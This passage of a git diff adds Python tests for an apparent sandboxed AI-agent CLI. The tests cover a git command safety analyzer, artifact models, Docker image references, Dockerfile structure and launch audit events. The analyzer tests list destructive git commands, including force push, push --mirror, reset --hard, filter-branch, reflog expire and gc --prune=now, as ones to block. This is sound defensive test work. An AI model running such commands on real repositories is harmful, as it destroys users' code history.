"file.py"]) is not None + + def test_restore_staged(self) -> None: + assert analyze_git(["git", "restore", "--staged", "file.py"]) is None + + def test_full_path_git(self) -> None: + assert analyze_git(["/usr/bin/git", "push", "--force"]) is not None + + def test_git_with_global_options(self) -> None: + assert analyze_git(["git", "-C", "/path", "push", "-f"]) is not None + + def test_unknown_subcommand(self) -> None: + assert analyze_git(["git", "status"]) is None + assert analyze_git(["git", "log"]) is None + assert analyze_git(["git", "diff"]) is None + + # Catastrophic commands (v0.2.0) + + def test_push_mirror(self) -> None: + assert analyze_git(["git", "push", "--mirror"]) is not None + + def test_reflog_expire_now(self) -> None: + assert analyze_git(["git", "reflog", "expire", "--expire-unreachable=now"]) is not None + assert analyze_git(["git", "reflog", "expire", "--expire-unreachable", "now"]) is not None + + def test_reflog_show_allowed(self) -> None: + assert analyze_git(["git", "reflog"]) is None + assert analyze_git(["git", "reflog", "show"]) is None + + def test_gc_prune_now(self) -> None: + assert analyze_git(["git", "gc", "--prune=now"]) is not None + assert analyze_git(["git", "gc", "--prune", "now"]) is not None + + def test_gc_allowed(self) -> None: + assert analyze_git(["git", "gc"]) is None + assert analyze_git(["git", "gc", "--aggressive"]) is None + + def test_filter_branch_blocked(self) -> None: + assert analyze_git(["git", "filter-branch"]) is not None + assert analyze_git(["git", "filter-branch", "--tree-filter", "..."]) is not None + + # DX polish (v0.2.0) - help/version bypass + + def test_git_help_allowed(self) -> None: + assert analyze_git(["git", "help"]) is None + assert analyze_git(["git", "help", "push"]) is None + assert analyze_git(["git", "help", "reset"]) is None + + def test_help_flag_bypasses_block(self) -> None: + assert analyze_git(["git", "push", "--force", "--help"]) is None + assert analyze_git(["git", "reset", "--hard", "--help"]) is None + assert analyze_git(["git", "clean", "-f", "--help"]) is None + assert analyze_git(["git", "filter-branch", "--help"]) is None + + def test_h_flag_bypasses_block(self) -> None: + assert analyze_git(["git", "push", "-f", "-h"]) is None + assert analyze_git(["git", "reset", "--hard", "-h"]) is None + assert analyze_git(["git", "branch", "-D", "-h"]) is None + + def test_version_flag_bypasses_block(self) -> None: + assert analyze_git(["git", "push", "--force", "--version"]) is None + assert analyze_git(["git", "gc", "--prune=now", "--version"]) is None + + # ─── Negative / edge-case tests (from task plan) ──────────────────── + + def test_bare_git_no_subcommand(self) -> None: + """Bare `git` with no subcommand → allowed (None).""" + assert analyze_git(["git"]) is None + + def test_unknown_git_subcommands_pass_through(self) -> None: + """Unknown subcommands don't trigger blocks.""" + assert analyze_git(["git", "bisect"]) is None + assert analyze_git(["git", "worktree", "add", "foo"]) is None + + def test_empty_token_list(self) -> None: + """Empty token list → allowed.""" + assert analyze_git([]) is None + + def test_single_empty_string_token(self) -> None: + """Single empty string → not git, allowed.""" + assert analyze_git([""]) is None + + def test_tokens_with_only_flags(self) -> None: + """Tokens that are just flags (no git binary) → not git.""" + assert analyze_git(["--force", "-f"]) is None diff --git a/tests/test_governed_artifact_models.py b/tests/test_governed_artifact_models.py new file mode 100644 index 0000000..14aa083 --- /dev/null +++ b/tests/test_governed_artifact_models.py @@ -0,0 +1,298 @@ +"""Unit tests for governed artifact type hierarchy (spec-06). + +Covers construction, immutability, enum membership, defaults, and re-exports. +""" + +from __future__ import annotations + +import dataclasses + +import pytest + +from scc_cli.core.governed_artifacts import ( + ArtifactBundle, + ArtifactInstallIntent, + ArtifactKind, + ArtifactRenderPlan, + GovernedArtifact, + ProviderArtifactBinding, +) + +# --------------------------------------------------------------------------- +# ArtifactKind enum +# --------------------------------------------------------------------------- + + +class TestArtifactKind: + def test_all_members_present(self) -> None: + expected = {"skill", "mcp_server", "native_integration", "bundle"} + assert {m.value for m in ArtifactKind} == expected + + def test_str_comparison(self) -> None: + assert ArtifactKind.SKILL == "skill" + assert ArtifactKind.MCP_SERVER == "mcp_server" + assert ArtifactKind.NATIVE_INTEGRATION == "native_integration" + assert ArtifactKind.BUNDLE == "bundle" + + def test_member_count(self) -> None: + assert len(ArtifactKind) == 4 + + +# --------------------------------------------------------------------------- +# ArtifactInstallIntent enum +# --------------------------------------------------------------------------- + + +class TestArtifactInstallIntent: + def test_all_members_present(self) -> None: + expected = {"required", "available", "disabled", "request-only"} + assert {m.value for m in ArtifactInstallIntent} == expected + + def test_str_comparison(self) -> None: + assert ArtifactInstallIntent.REQUIRED == "required" + assert ArtifactInstallIntent.AVAILABLE == "available" + assert ArtifactInstallIntent.DISABLED == "disabled" + assert ArtifactInstallIntent.REQUEST_ONLY == "request-only" + + def test_member_count(self) -> None: + assert len(ArtifactInstallIntent) == 4 + + +# --------------------------------------------------------------------------- +# GovernedArtifact +# --------------------------------------------------------------------------- + + +class TestGovernedArtifact: + def test_construction_all_fields(self) -> None: + artifact = GovernedArtifact( + kind=ArtifactKind.SKILL, + name="code-review-skill", + version="1.4.2", + publisher="ai-team", + pinned=True, + source_type="git", + source_url="https://git.example.se/ai/agent-artifacts.git", + source_path="skills/code-review", + source_ref="v1.4.2", + install_intent=ArtifactInstallIntent.REQUIRED, + ) + assert artifact.kind == ArtifactKind.SKILL + assert artifact.name == "code-review-skill" + assert artifact.version == "1.4.2" + assert artifact.publisher == "ai-team" + assert artifact.pinned is True + assert artifact.source_type == "git" + assert artifact.source_url == "https://git.example.se/ai/agent-artifacts.git" + assert artifact.source_path == "skills/code-review" + assert artifact.source_ref == "v1.4.2" + assert artifact.install_intent == ArtifactInstallIntent.REQUIRED + + def test_defaults(self) -> None: + artifact = GovernedArtifact(kind=ArtifactKind.MCP_SERVER, name="github-mcp") + assert artifact.version is None + assert artifact.publisher is None + assert artifact.pinned is False + assert artifact.source_type is None + assert artifact.source_url is None + assert artifact.source_path is None + assert artifact.source_ref is None + assert artifact.install_intent == ArtifactInstallIntent.AVAILABLE + + def test_frozen_immutability(self) -> None: + artifact = GovernedArtifact(kind=ArtifactKind.SKILL, name="test") + with pytest.raises(dataclasses.FrozenInstanceError): + artifact.name = "mutated" # type: ignore[misc] + + +# --------------------------------------------------------------------------- +# ProviderArtifactBinding +# --------------------------------------------------------------------------- + + +class TestProviderArtifactBinding: + def test_construction_all_fields(self) -> None: + binding = ProviderArtifactBinding( + provider="claude", + native_ref="./claude/github-hooks.json", + native_config={ + "hooks": "./claude/github-hooks.json", + "marketplace_bundle": "./claude/github-marketplace", + }, + transport_type="stdio", + ) + assert binding.provider == "claude" + assert binding.native_ref == "./claude/github-hooks.json" + assert binding.native_config["hooks"] == "./claude/github-hooks.json" + assert binding.transport_type == "stdio" + + def test_defaults(self) -> None: + binding = ProviderArtifactBinding(provider="codex") + assert binding.native_ref is None + assert binding.native_config == {} + assert binding.transport_type is None + + def test_frozen_immutability(self) -> None: + binding = ProviderArtifactBinding(provider="claude") + with pytest.raises(dataclasses.FrozenInstanceError): + binding.provider = "codex" # type: ignore[misc] + + +# --------------------------------------------------------------------------- +# ArtifactBundle +# --------------------------------------------------------------------------- + + +class TestArtifactBundle: + def test_construction_all_fields(self) -> None: + bundle = ArtifactBundle( + name="github-dev", + description="GitHub development workflow bundle", + artifacts=("code-review-skill", "github-mcp", "github-native", "team-guidance"), + install_intent=ArtifactInstallIntent.AVAILABLE, + ) + assert bundle.name == "github-dev" + assert bundle.description == "GitHub development workflow bundle" + assert len(bundle.artifacts) == 4 + assert "code-review-skill" in bundle.artifacts + assert bundle.install_intent == ArtifactInstallIntent.AVAILABLE + + def test_defaults(self) -> None: + bundle = ArtifactBundle(name="minimal") + assert bundle.description == "" + assert bundle.artifacts == () + assert bundle.install_intent == ArtifactInstallIntent.AVAILABLE + + def test_frozen_immutability(self) -> None: + bundle = ArtifactBundle(name="test") + with pytest.raises(dataclasses.FrozenInstanceError): + bundle.name = "mutated" # type: ignore[misc] + + +# --------------------------------------------------------------------------- +# ArtifactRenderPlan +# --------------------------------------------------------------------------- + + +class TestArtifactRenderPlan: + def test_construction_all_fields(self) -> None: + binding = ProviderArtifactBinding(provider="claude", native_ref="./hooks.json") + plan = ArtifactRenderPlan( + bundle_id="github-dev", + provider="claude", + bindings=(binding,), + skipped=("codex-only-rule",), + effective_artifacts=("code-review-skill", "github-mcp"), + ) + assert plan.bundle_id == "github-dev" + assert plan.provider == "claude" + assert len(plan.bindings) == 1 + assert plan.bindings[0].provider == "claude" + assert plan.skipped == ("codex-only-rule",) + assert "code-review-skill" in plan.effective_artifacts + + def test_defaults(self) -> None: + plan = ArtifactRenderPlan(bundle_id="empty", provider="codex") + assert plan.bindings == () + assert plan.skipped == () + assert plan.effective_artifacts == () + + def test_frozen_immutability(self) -> None: + plan = ArtifactRenderPlan(bundle_id="test", provider="claude") + with pytest.raises(dataclasses.FrozenInstanceError): + plan.bundle_id = "mutated" # type: ignore[misc] + + +# --------------------------------------------------------------------------- +# Re-exports from contracts module +# --------------------------------------------------------------------------- + + +class TestContractsReExports: + """Verify that all governed artifact models are importable from contracts.""" + + def test_import_from_contracts(self) -> None: + from scc_cli.core.contracts import ArtifactBundle as ContractsArtifactBundle + from scc_cli.core.contracts import ArtifactInstallIntent as ContractsArtifactInstallIntent + from scc_cli.core.contracts import ArtifactKind as ContractsArtifactKind + from scc_cli.core.contracts import ArtifactRenderPlan as ContractsArtifactRenderPlan + from scc_cli.core.contracts import GovernedArtifact as ContractsGovernedArtifact + from scc_cli.core.contracts import ( + ProviderArtifactBinding as ContractsProviderArtifactBinding, + ) + + # Quick smoke — just verify they're the same class objects + assert ContractsArtifactKind is ArtifactKind + assert ContractsArtifactInstallIntent is ArtifactInstallIntent + assert ContractsGovernedArtifact is GovernedArtifact + assert ContractsProviderArtifactBinding is ProviderArtifactBinding + assert ContractsArtifactBundle is ArtifactBundle + assert ContractsArtifactRenderPlan is ArtifactRenderPlan + + +# --------------------------------------------------------------------------- +# Cross-model integration +# --------------------------------------------------------------------------- + + +class TestCrossModelIntegration: + """End-to-end construction matching spec-06 YAML example.""" + + def test_spec_example_round_trip(self) -> None: + """Build the spec-06 example model graph and verify relationships.""" + skill = GovernedArtifact( + kind=ArtifactKind.SKILL, + name="code-review-skill", + source_type="git", + source_url="https://git.example.se/ai/agent-artifacts.git", + source_path="skills/code-review", + source_ref="v1.4.2", + install_intent=ArtifactInstallIntent.AVAILABLE, + ) + mcp = GovernedArtifact( + kind=ArtifactKind.MCP_SERVER, + name="github-mcp", + source_type="git", + source_url="https://git.example.se/ai/agent-artifacts.git", + source_path="mcp/github.json", + source_ref="v1.4.2", + install_intent=ArtifactInstallIntent.REQUIRED, + ) + native = GovernedArtifact( + kind=ArtifactKind.NATIVE_INTEGRATION, + name="github-native", + install_intent=ArtifactInstallIntent.AVAILABLE, + ) + + claude_binding = ProviderArtifactBinding( + provider="claude", + native_config={ + "hooks": "./claude/github-hooks.json", + "marketplace_bundle": "./claude/github-marketplace", + }, + ) + codex_binding = ProviderArtifactBinding( + provider="codex", + native_config={ + "plugin_bundle": "./codex/github-plugin", + "rules": "./codex/rules/github.rules", + }, + ) + + bundle = ArtifactBundle( + name="github-dev", + artifacts=(skill.name, mcp.name, native.name), + install_intent=ArtifactInstallIntent.AVAILABLE, + ) + + render_plan = ArtifactRenderPlan( + bundle_id=bundle.name, + provider="claude", + bindings=(claude_binding,), + skipped=(), + effective_artifacts=(skill.name, mcp.name, native.name), + ) + + assert render_plan.bundle_id == bundle.name + assert len(render_plan.effective_artifacts) == 3 + assert codex_binding.provider == "codex" diff --git a/tests/test_image_contracts.py b/tests/test_image_contracts.py new file mode 100644 index 0000000..f80d6ab --- /dev/null +++ b/tests/test_image_contracts.py @@ -0,0 +1,185 @@ +"""Tests for ImageRef dataclass, image_ref parser, and SCC image constants.""" + +from __future__ import annotations + +import pytest + +from scc_cli.core.image_contracts import ( + SCC_BASE_IMAGE, + SCC_CLAUDE_IMAGE, + SCC_CLAUDE_IMAGE_REF, + ImageRef, + image_ref, +) + +# ───────────────────────────────────────────────────────────────────────────── +# ImageRef.full_ref() +# ───────────────────────────────────────────────────────────────────────────── + + +class TestImageRefFullRef: + """ImageRef.full_ref() produces correct canonical strings.""" + + def test_bare_repository(self) -> None: + ref = ImageRef(repository="myrepo", tag="latest") + assert ref.full_ref() == "myrepo:latest" + + def test_repository_with_custom_tag(self) -> None: + ref = ImageRef(repository="myrepo", tag="v1.2.3") + assert ref.full_ref() == "myrepo:v1.2.3" + + def test_registry_and_repository(self) -> None: + ref = ImageRef(registry="ghcr.io", repository="org/myrepo", tag="latest") + assert ref.full_ref() == "ghcr.io/org/myrepo:latest" + + def test_with_digest_only(self) -> None: + ref = ImageRef( + repository="myrepo", + tag="", + digest="sha256:abcdef1234567890", + ) + assert ref.full_ref() == "myrepo@sha256:abcdef1234567890" + + def test_with_tag_and_digest(self) -> None: + ref = ImageRef( + registry="ghcr.io", + repository="org/myrepo", + tag="v1", + digest="sha256:abcdef1234567890", + ) + assert ref.full_ref() == "ghcr.io/org/myrepo:v1@sha256:abcdef1234567890" + + def test_no_registry_with_digest(self) -> None: + ref = ImageRef( + repository="myrepo", + tag="latest", + digest="sha256:abc123", + ) + assert ref.full_ref() == "myrepo:latest@sha256:abc123" + + def test_empty_tag_no_digest(self) -> None: + ref = ImageRef(repository="myrepo", tag="") + assert ref.full_ref() == "myrepo" + + +# ───────────────────────────────────────────────────────────────────────────── +# image_ref() parser +# ───────────────────────────────────────────────────────────────────────────── + + +class TestImageRefParser: + """image_ref() parses standard Docker reference formats.""" + + def test_bare_repo(self) -> None: + result = image_ref("ubuntu") + assert result.registry == "" + assert result.repository == "ubuntu" + assert result.tag == "latest" + assert result.digest is None + + def test_repo_with_tag(self) -> None: + result = image_ref("ubuntu:22.04") + assert result.registry == "" + assert result.repository == "ubuntu" + assert result.tag == "22.04" + assert result.digest is None + + def test_registry_repo_tag(self) -> None: + result = image_ref("ghcr.io/org/myrepo:v1.0") + assert result.registry == "ghcr.io" + assert result.repository == "org/myrepo" + assert result.tag == "v1.0" + assert result.digest is None + + def test_registry_repo_digest(self) -> None: + result = image_ref("ghcr.io/org/myrepo@sha256:abcdef") + assert result.registry == "ghcr.io" + assert result.repository == "org/myrepo" + assert result.tag == "latest" + assert result.digest == "sha256:abcdef" + + def test_registry_repo_tag_and_digest(self) -> None: + result = image_ref("ghcr.io/org/myrepo:v1@sha256:abcdef") + assert result.registry == "ghcr.io" + assert result.repository == "org/myrepo" + assert result.tag == "v1" + assert result.digest == "sha256:abcdef" + + def test_library_slash_repo(self) -> None: + """library/ubuntu should keep the full path as repository.""" + result = image_ref("library/ubuntu:22.04") + assert result.registry == "" + assert result.repository == "library/ubuntu" + assert result.tag == "22.04" + + def test_localhost_registry(self) -> None: + result = image_ref("localhost/myrepo:dev") + assert result.registry == "localhost" + assert result.repository == "myrepo" + assert result.tag == "dev" + + def test_registry_with_port(self) -> None: + result = image_ref("localhost:5000/myrepo:dev") + assert result.registry == "localhost:5000" + assert result.repository == "myrepo" + assert result.tag == "dev" + + def test_scc_base_roundtrip(self) -> None: + """Parsing the full_ref of SCC_BASE_IMAGE roundtrips correctly.""" + parsed = image_ref(SCC_BASE_IMAGE.full_ref()) + assert parsed.repository == SCC_BASE_IMAGE.repository + assert parsed.tag == SCC_BASE_IMAGE.tag + + def test_scc_claude_roundtrip(self) -> None: + """Parsing the full_ref of SCC_CLAUDE_IMAGE roundtrips correctly.""" + parsed = image_ref(SCC_CLAUDE_IMAGE.full_ref()) + assert parsed.repository == SCC_CLAUDE_IMAGE.repository + assert parsed.tag == SCC_CLAUDE_IMAGE.tag + + +# ───────────────────────────────────────────────────────────────────────────── +# ImageRef frozen behavior +# ───────────────────────────────────────────────────────────────────────────── + + +class TestImageRefFrozen: + """ImageRef is immutable.""" + + def test_cannot_set_field(self) -> None: + ref = ImageRef(repository="myrepo") + with pytest.raises(AttributeError): + ref.repository = "other" # type: ignore[misc] + + def test_hashable(self) -> None: + a = ImageRef(repository="repo", tag="v1") + b = ImageRef(repository="repo", tag="v1") + assert hash(a) == hash(b) + assert a == b + + +# ───────────────────────────────────────────────────────────────────────────── +# SCC image constants +# ───────────────────────────────────────────────────────────────────────────── + + +class TestSCCImageConstants: + """SCC-owned image constants have expected values.""" + + def test_scc_base_image(self) -> None: + assert SCC_BASE_IMAGE.repository == "scc-base" + assert SCC_BASE_IMAGE.tag == "latest" + assert SCC_BASE_IMAGE.registry == "" + assert SCC_BASE_IMAGE.digest is None + + def test_scc_claude_image(self) -> None: + assert SCC_CLAUDE_IMAGE.repository == "scc-agent-claude" + assert SCC_CLAUDE_IMAGE.tag == "latest" + assert SCC_CLAUDE_IMAGE.registry == "" + assert SCC_CLAUDE_IMAGE.digest is None + + def test_scc_claude_image_ref_string(self) -> None: + assert SCC_CLAUDE_IMAGE_REF == "scc-agent-claude:latest" + + def test_claude_ref_matches_constant(self) -> None: + """SCC_CLAUDE_IMAGE_REF equals SCC_CLAUDE_IMAGE.full_ref().""" + assert SCC_CLAUDE_IMAGE_REF == SCC_CLAUDE_IMAGE.full_ref() diff --git a/tests/test_image_structure.py b/tests/test_image_structure.py new file mode 100644 index 0000000..3cfcb86 --- /dev/null +++ b/tests/test_image_structure.py @@ -0,0 +1,269 @@ +"""Structural tests for SCC container images (Dockerfiles). + +These tests verify Dockerfile content without requiring Docker. +They parse the Dockerfile text to check expected structural properties: +- scc-base creates both provider config dirs with correct permissions +- scc-agent-codex pins the Codex CLI version via ARG +- Agent user is non-root (uid 1000) +- Build ordering and determinism properties +""" + +from __future__ import annotations + +import re +from pathlib import Path + +import pytest + +IMAGES_DIR = Path(__file__).resolve().parent.parent / "images" + + +# ───────────────────────────────────────────────────────────────────────────── +# Helpers +# ───────────────────────────────────────────────────────────────────────────── + + +def _read_dockerfile(image_name: str) -> str: + """Read a Dockerfile from the images/ directory.""" + path = IMAGES_DIR / image_name / "Dockerfile" + assert path.exists(), f"Dockerfile not found: {path}" + return path.read_text() + + +def _normalize_continuations(text: str) -> str: + """Collapse backslash-newline continuations into single logical lines.""" + return re.sub(r"\\\n\s*", " ", text) + + +# ───────────────────────────────────────────────────────────────────────────── +# scc-base +# ───────────────────────────────────────────────────────────────────────────── + + +class TestSccBaseDockerfile: + """scc-base Dockerfile structural properties.""" + + @pytest.fixture() + def dockerfile(self) -> str: + return _read_dockerfile("scc-base") + + @pytest.fixture() + def normalized(self, dockerfile: str) -> str: + return _normalize_continuations(dockerfile) + + def test_creates_claude_config_dir(self, normalized: str) -> None: + """scc-base creates /home/agent/.claude directory.""" + assert "/home/agent/.claude" in normalized + + def test_creates_codex_config_dir(self, normalized: str) -> None: + """scc-base creates /home/agent/.codex directory.""" + assert "/home/agent/.codex" in normalized + + def test_claude_dir_permissions_0700(self, normalized: str) -> None: + """scc-base sets .claude dir to 0700.""" + chmod_lines = [ + line.strip() + for line in normalized.splitlines() + if "chmod" in line and ".claude" in line + ] + assert any("0700" in line for line in chmod_lines), ( + f"Expected chmod 0700 on .claude dir, found: {chmod_lines}" + ) + + def test_codex_dir_permissions_0700(self, normalized: str) -> None: + """scc-base sets .codex dir to 0700.""" + chmod_lines = [ + line.strip() for line in normalized.splitlines() if "chmod" in line and ".codex" in line + ] + assert any("0700" in line for line in chmod_lines), ( + f"Expected chmod 0700 on .codex dir, found: {chmod_lines}" + ) + + def test_agent_user_uid_1000(self, dockerfile: str) -> None: + """scc-base creates agent user with uid 1000.""" + assert re.search(r"useradd.*-u\s*1000.*agent", dockerfile) + + def test_chown_agent_claude(self, normalized: str) -> None: + """scc-base chowns .claude to agent:agent.""" + chown_lines = [ + line.strip() + for line in normalized.splitlines() + if "chown" in line and ".claude" in line + ] + assert any("agent:agent" in line for line in chown_lines), ( + f"Expected chown agent:agent on .claude, found: {chown_lines}" + ) + + def test_chown_agent_codex(self, normalized: str) -> None: + """scc-base chowns .codex to agent:agent.""" + chown_lines = [ + line.strip() for line in normalized.splitlines() if "chown" in line and ".codex" in line + ] + assert any("agent:agent" in line for line in chown_lines), ( + f"Expected chown agent:agent on .codex, found: {chown_lines}" + ) + + def test_final_user_is_agent(self, dockerfile: str) -> None: + """scc-base ends with USER agent (non-root).""" + user_lines = [ + line.strip() for line in dockerfile.splitlines() if line.strip().startswith("USER ") + ] + assert user_lines, "No USER directive found" + assert user_lines[-1] == "USER agent" + + def test_dirs_created_before_user_switch(self, dockerfile: str) -> None: + """Provider config dirs are created before switching to agent user.""" + lines = dockerfile.splitlines() + mkdir_idx = None + final_user_idx = None + for i, line in enumerate(lines): + if "mkdir" in line and (".claude" in line or ".codex" in line): + mkdir_idx = i + if line.strip() == "USER agent": + final_user_idx = i + assert mkdir_idx is not None, "mkdir for config dirs not found" + assert final_user_idx is not None, "USER agent not found" + assert mkdir_idx < final_user_idx, ( + "Config dirs must be created before switching to agent user" + ) + + def test_safety_eval_installed(self, dockerfile: str) -> None: + """scc-base installs the safety evaluator.""" + assert "scc_safety_eval" in dockerfile + + def test_wrappers_in_path(self, dockerfile: str) -> None: + """scc-base puts wrapper scripts in PATH.""" + assert "/usr/local/lib/scc/bin" in dockerfile + + +# ───────────────────────────────────────────────────────────────────────────── +# scc-agent-codex +# ───────────────────────────────────────────────────────────────────────────── + + +class TestSccAgentCodexDockerfile: + """scc-agent-codex Dockerfile structural properties.""" + + @pytest.fixture() + def dockerfile(self) -> str: + return _read_dockerfile("scc-agent-codex") + + @pytest.fixture() + def normalized(self, dockerfile: str) -> str: + return _normalize_continuations(dockerfile) + + def test_based_on_scc_base(self, dockerfile: str) -> None: + """scc-agent-codex inherits from scc-base.""" + assert re.search(r"FROM\s+scc-base", dockerfile) + + def test_codex_version_arg_declared(self, dockerfile: str) -> None: + """scc-agent-codex declares an ARG for Codex version pinning.""" + assert re.search(r"ARG\s+CODEX_VERSION", dockerfile) + + def test_codex_version_has_default(self, dockerfile: str) -> None: + """CODEX_VERSION ARG has a default value.""" + assert re.search(r"ARG\s+CODEX_VERSION\s*=", dockerfile) + + def test_npm_install_references_version_arg(self, normalized: str) -> None: + """npm install uses the CODEX_VERSION ARG.""" + assert "CODEX_VERSION" in normalized + assert "@openai/codex" in normalized + + def test_installs_nodejs(self, dockerfile: str) -> None: + """scc-agent-codex installs Node.js.""" + assert "nodejs" in dockerfile + + def test_installs_bubblewrap(self, dockerfile: str) -> None: + """scc-agent-codex installs system bubblewrap for Codex sandboxing.""" + assert "bubblewrap" in dockerfile + + def test_installs_socat(self, dockerfile: str) -> None: + """scc-agent-codex installs socat for browser-auth callback relaying.""" + assert "socat" in dockerfile + + def test_final_user_is_agent(self, dockerfile: str) -> None: + """scc-agent-codex ends with USER agent (non-root).""" + user_lines = [ + line.strip() for line in dockerfile.splitlines() if line.strip().startswith("USER ") + ] + assert user_lines, "No USER directive found" + assert user_lines[-1] == "USER agent" + + def test_entrypoint_is_bash(self, dockerfile: str) -> None: + """scc-agent-codex uses bash entrypoint (OCI adapter execs explicitly).""" + assert re.search(r'ENTRYPOINT\s+\["/bin/bash"\]', dockerfile) + + +# ───────────────────────────────────────────────────────────────────────────── +# scc-agent-claude +# ───────────────────────────────────────────────────────────────────────────── + + +class TestSccAgentClaudeDockerfile: + """scc-agent-claude Dockerfile structural properties (baseline checks).""" + + @pytest.fixture() + def dockerfile(self) -> str: + return _read_dockerfile("scc-agent-claude") + + def test_based_on_scc_base(self, dockerfile: str) -> None: + """scc-agent-claude inherits from scc-base.""" + assert re.search(r"FROM\s+scc-base", dockerfile) + + def test_node_major_arg_declared(self, dockerfile: str) -> None: + """scc-agent-claude declares an ARG for Node LTS selection.""" + assert re.search(r"ARG\s+NODE_MAJOR", dockerfile) + + def test_installs_nodejs(self, dockerfile: str) -> None: + """scc-agent-claude installs Node.js.""" + assert "nodejs" in dockerfile + + def test_nodesource_bootstrap_uses_clean_system_path(self, dockerfile: str) -> None: + """scc-agent-claude avoids SCC wrapper PATH interception during bootstrap.""" + assert ( + 'export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"' + in dockerfile + ) + assert ( + '/usr/bin/curl -fsSL "https://deb.nodesource.com/setup_${NODE_MAJOR}.x"' in dockerfile + ) + + def test_final_user_is_agent(self, dockerfile: str) -> None: + """scc-agent-claude ends with USER agent (non-root).""" + user_lines = [ + line.strip() for line in dockerfile.splitlines() if line.strip().startswith("USER ") + ] + assert user_lines[-1] == "USER agent" + + def test_entrypoint_is_bash(self, dockerfile: str) -> None: + """scc-agent-claude uses bash entrypoint.""" + assert re.search(r'ENTRYPOINT\s+\["/bin/bash"\]', dockerfile) + + +# ───────────────────────────────────────────────────────────────────────────── +# scc-egress-proxy +# ───────────────────────────────────────────────────────────────────────────── + + +class TestSccEgressProxyDockerfile: + """scc-egress-proxy Dockerfile structural properties (baseline checks).""" + + @pytest.fixture() + def dockerfile(self) -> str: + return _read_dockerfile("scc-egress-proxy") + + def test_based_on_alpine(self, dockerfile: str) -> None: + """scc-egress-proxy uses Alpine base.""" + assert re.search(r"FROM\s+alpine", dockerfile) + + def test_installs_squid(self, dockerfile: str) -> None: + """scc-egress-proxy installs squid.""" + assert "squid" in dockerfile + + def test_exposes_3128(self, dockerfile: str) -> None: + """scc-egress-proxy exposes port 3128.""" + assert "3128" in dockerfile + + def test_has_healthcheck(self, dockerfile: str) -> None: + """scc-egress-proxy has a HEALTHCHECK.""" + assert "HEALTHCHECK" in dockerfile diff --git a/tests/test_import_boundaries.py b/tests/test_import_boundaries.py index c23d396..c100a23 100644 --- a/tests/test_import_boundaries.py +++ b/tests/test_import_boundaries.py @@ -517,7 +517,23 @@ class TestNoTestFileDuplicates: """ # Allowlist: files with explicit justification and tracking issue - ALLOWED_FILES: set[str] = set() # Add files here with issue links if needed + # M005/S01/T02: characterization tests for top-4 split targets (pre-S02 surgery safety net) + # M005/S01/T03: characterization tests for remaining high-priority split targets + ALLOWED_FILES: set[str] = { + "test_launch_flow_characterization.py", + "test_dashboard_orchestrator_characterization.py", + "test_docker_launch_characterization.py", + "test_personal_profiles_characterization.py", + "test_compute_effective_config_characterization.py", + "test_setup_characterization.py", + "test_worktree_use_cases_characterization.py", + "test_marketplace_materialize_characterization.py", + "test_team_commands_characterization.py", + "test_config_commands_characterization.py", + "test_wizard_characterization.py", + "test_app_dashboard_characterization.py", + "test_launch_preflight_characterization.py", # M008/S01 — preflight refactor safety net + } def test_no_new_suffix_test_files(self) -> None: """Test files should not have _new suffix (implies duplicate exists).""" diff --git a/tests/test_integration.py b/tests/test_integration.py index d569b1e..7c278e2 100644 --- a/tests/test_integration.py +++ b/tests/test_integration.py @@ -20,7 +20,8 @@ from scc_cli.cli import app from scc_cli.ports.dependency_installer import DependencyInstallResult from scc_cli.ports.session_models import SessionSummary -from tests.fakes import build_fake_adapters +from tests.fakes import FakeAuditEventSink, build_fake_adapters +from tests.fakes.fake_agent_provider import FakeAgentProvider runner = CliRunner() @@ -72,7 +73,7 @@ def sample_org_config(): }, "defaults": { "allowed_plugins": ["*"], - "network_policy": "unrestricted", + "network_policy": "open", "session": { "timeout_hours": 10, "auto_resume": True, @@ -221,8 +222,16 @@ def test_start_with_workspace_launches_docker(self, full_config_environment, git return_value=fake_adapters, ), patch("scc_cli.commands.launch.workspace.check_branch_safety"), + patch( + "scc_cli.commands.launch.flow.resolve_launch_provider", + return_value=("claude", "cli_flag"), + ), + patch( + "scc_cli.commands.launch.flow.collect_launch_readiness", + return_value=MagicMock(launch_ready=True), + ), ): - runner.invoke(app, ["start", str(git_workspace)]) + runner.invoke(app, ["start", str(git_workspace), "--provider", "claude"]) # Sandbox runtime should be invoked assert fake_adapters.sandbox_runtime.list_running() @@ -470,6 +479,144 @@ def test_worktree_with_install_deps( dependencies.dependency_installer.install.assert_called_once_with(worktree_path) + def test_worktree_auto_start_appends_shared_audit_events( + self, full_config_environment, git_workspace + ): + """Worktree auto-start should reuse the shared preflight and audit path.""" + from scc_cli.application.worktree import WorktreeCreateResult, WorktreeDependencies + + worktree_path = git_workspace.parent / "claude" / "feature-auto" + worktree_path.mkdir(parents=True) + git_client = MagicMock() + git_client.is_git_repo.return_value = True + git_client.has_commits.return_value = True + dependencies = WorktreeDependencies( + git_client=git_client, + dependency_installer=MagicMock(), + ) + fake_adapters = build_fake_adapters() + + with ( + patch( + "scc_cli.commands.worktree.worktree_commands._build_worktree_dependencies", + return_value=(dependencies, fake_adapters), + ), + patch( + "scc_cli.commands.worktree.worktree_commands.worktree_use_cases.create_worktree", + return_value=WorktreeCreateResult( + worktree_path=worktree_path, + worktree_name="feature-auto", + branch_name="scc/feature-auto", + base_branch="main", + dependencies_installed=True, + ), + ), + patch( + "scc_cli.commands.worktree.worktree_commands.config.is_standalone_mode", + return_value=True, + ), + patch( + "scc_cli.commands.worktree.worktree_commands.config.load_user_config", + return_value={}, + ), + patch("scc_cli.commands.worktree.worktree_commands.Confirm.ask", return_value=True), + patch( + "scc_cli.commands.worktree.worktree_commands.resolve_launch_provider", + return_value=("claude", None), + ), + patch( + "scc_cli.commands.worktree.worktree_commands.collect_launch_readiness", + return_value=MagicMock(launch_ready=True), + ), + ): + result = runner.invoke( + app, ["worktree", ".", "create", str(git_workspace), "feature-auto"] + ) + + assert result.exit_code == 0 + assert isinstance(fake_adapters.audit_event_sink, FakeAuditEventSink) + sink = fake_adapters.audit_event_sink + assert [event.event_type for event in sink.events] == [ + "launch.preflight.passed", + "launch.started", + ] + assert sink.events[0].metadata["workspace_path"] == str(worktree_path) + + def test_worktree_auto_start_blocks_before_runtime_when_preflight_fails( + self, full_config_environment, git_workspace + ): + """Worktree auto-start should fail before runtime start on blocked preflight.""" + from scc_cli.application.compute_effective_config import EffectiveConfig + from scc_cli.application.worktree import WorktreeCreateResult, WorktreeDependencies + + worktree_path = git_workspace.parent / "claude" / "feature-blocked" + worktree_path.mkdir(parents=True) + git_client = MagicMock() + git_client.is_git_repo.return_value = True + git_client.has_commits.return_value = True + 